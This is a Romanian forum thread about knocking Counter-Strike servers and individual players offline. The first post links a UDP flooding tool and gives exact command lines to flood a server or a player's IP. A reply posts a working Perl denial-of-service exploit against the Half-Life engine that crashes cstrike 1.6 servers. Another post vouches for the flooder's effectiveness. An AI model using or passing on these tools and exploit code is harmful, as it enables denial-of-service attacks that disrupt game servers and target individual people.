Jump to content
BizZaroO

Counter Strike flood

Recommended Posts

Din greseala am dat peste un programel ce functioneaza pe porturile UDP (la fel ca si Counter Strike). Ce face acest programel? Trimite foarte multe date in continuu la infinit si provoaca un lag imens. Nu a fost creeat pentru asa ceva dar... am avut eu un feeling ca va functiona daca voi incerca.

Mare atentie: daca il veti folosi de pe pc-ul vostru este posibil sa aveti probleme pentru ca va apare ip-ul real. Si da, functioneaza pe orice server de Counter Strike si probabil are efect asupra oricarei aplicatii ce foloseste protocolul UDP.

Programul il puteti downloada de aici: http://aluigi.altervista.org/testz/udpsz.zip (click dreapta pe link si save as... altfel nu va porni download)

sau de aici: http://rapidshare.com/files/30616931/udpsz.zip.html

Folositi sintaxa urmatoare:

Cod:

udpsz -l 0 hostname.domeniu.ro 27015 55555

Sau daca vreti ca un jucator sa aiba lag mare sau sa nu se poata conecta pe NICIUN server puneti ip-ul lui si port 27005

Exemplu:

Cod:

udpsz -l 0 212.1.1.1 27005 55555

Inlocuiti hostname.domeniu.ro cu serverul in care vreti sa dati sau 212.1.1.1 cu ip-ul jucatorului pe care vreti sa il floodati individual.

Mie mia mers

Link to comment
Share on other sites

De ce sa floodezi,daca il poti da jos :P.


#!/usr/bin/perl
# Server must not be running steam. /str0ke


# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$;

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}

Cred ca a mai fost postat dar e alternativa la acel flooder.

Link to comment
Share on other sites

Guest Nemessis

SLK programul functioneaza perfect pe orice server de cs. Conteaza totusi si viteza ta de net. O alta problema poate fi firewallul serverului de cs. Daca dai ping la acel server si nu iti da reply, nu te mai chinui pentru ca programul nu va functiona. Totusi cam din 20 de servere doar unul singur nu va fi afectat. Repet, totul este o chestiune de routare si banda de net in rest programul este eficient.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...